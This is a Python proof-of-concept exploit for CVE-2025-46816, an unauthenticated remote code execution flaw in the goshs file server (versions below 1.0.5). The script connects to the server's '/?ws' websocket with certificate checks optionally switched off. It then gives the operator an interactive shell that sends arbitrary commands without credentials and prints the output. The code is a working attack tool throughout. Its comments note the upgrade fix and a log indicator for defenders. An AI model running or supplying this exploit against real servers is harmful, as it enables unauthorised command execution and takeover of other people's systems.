import ssl
import json
import argparse
import readline
import websockets
from rich import print as rp
from urllib.parse import urlparse
from websockets.sync.client import connect
# Console helpers: each one prefixes the text with a coloured tag and passes
# any extra positional/keyword arguments through to rich's print (``rp``).
# The doubled backslash keeps rich from reading "[+]" / "[>]" / "[-]" as markup.


def msg(x, *args, **kw):
    """Print *x* with a green ``[+]`` prefix."""
    return rp(f"[green]\\[+][/] {x}", *args, **kw)


def log(x, *args, **kw):
    """Print *x* with a gold ``[>]`` prefix."""
    return rp(f"[gold3]\\[>][/] {x}", *args, **kw)


def err(x, *args, **kw):
    """Print *x* with a red ``[-]`` prefix."""
    return rp(f"[red]\\[-][/] {x}", *args, **kw)
def parse_opts():
    """Read the command-line options for this proof of concept.

    Returns:
        The ``argparse`` namespace with two attributes: ``target`` (required
        string, either a URL or a bare ``host:port``) and ``secure`` (bool,
        True when ``--secure``/``-s`` was given).
    """
    cli = argparse.ArgumentParser(
        description="Goshs exploit Unauthenticated Code Execution",
    )
    cli.add_argument(
        "--target",
        "-t",
        required=True,
        help="Target to attack, example: http://ip:port",
    )
    cli.add_argument(
        "--secure",
        "-s",
        action="store_true",
        help="Use encrypted websocket",
    )
    options = cli.parse_args()
    return options
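def get_unsafe_ssl_context(is_ssl):
    """Build a TLS context that does not authenticate the server.

    The returned context still encrypts the connection, but it accepts any
    certificate for any hostname. Traffic sent over it can therefore be read
    or altered by whoever terminates the TLS session, so it is only suitable
    for a lab instance that presents a self-signed certificate.

    Args:
        is_ssl: Truthy when the caller wants a ``wss://`` connection.

    Returns:
        ``None`` when *is_ssl* is falsy (plain ``ws://`` needs no context),
        otherwise an ``ssl.SSLContext`` with hostname checking and certificate
        verification both switched off.
    """
    if not is_ssl:
        return None
    ssl_context = ssl.create_default_context()
    # Order matters: the ssl module refuses CERT_NONE while check_hostname
    # is still enabled, so hostname checking is turned off first.
    ssl_context.check_hostname = False
    # Use the documented enum member; the previous ``False`` only worked
    # because it coerces to the integer 0, which is CERT_NONE.
    ssl_context.verify_mode = ssl.CERT_NONE
    return ssl_context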
if __name__ == "__main__":
    # Proof-of-concept client for the issue named in the banner below.
    # What it demonstrates: the script opens the server's "/?ws" websocket
    # and sends {"type": "command"} messages without presenting any
    # credential, then prints the "content" field of each reply.
    # For defenders: the banner gives the affected range as below 1.0.5, so
    # upgrading past that is the remediation this page points to, and
    # websocket upgrades on "/?ws" from unexpected clients are the network
    # observable to review in proxy or server logs.
    args = parse_opts()
    log("Exploit by [gold3]@jrjgjk[/gold3] on [gold3]gosh[/gold3] < 1.0.5 [gold3 u]CVE-2025-46816[/gold3 u]")

    # Accept either a full URL (keep only host:port) or a bare host:port,
    # for which urlparse yields an empty netloc.
    target = urlparse(args.target).netloc or args.target
    proto = "wss" if args.secure else "ws"
    uri = f"{proto}://{target}/?ws"
    msg(f"Connecting to [b blue]{uri}[/b blue]")

    exit_words = ("x", "exit", "quit", "q")
    tls_context = get_unsafe_ssl_context(args.secure)
    with connect(uri, ssl=tls_context) as ws_client:
        while True:
            cmd = input("\x1b[38;5;178mshell@\x1b[1;37mgoshs:\x1b[0m ")
            if not cmd.strip():
                # Blank line: prompt again without contacting the server.
                continue
            if cmd in exit_words:
                log("Bye !")
                break
            # One request, one reply: the loop blocks on recv() until the
            # server answers the message just sent.
            ws_client.send(json.dumps({"type": "command", "content": cmd}))
            reply = json.loads(ws_client.recv())
            print(reply.get("content", "Error"))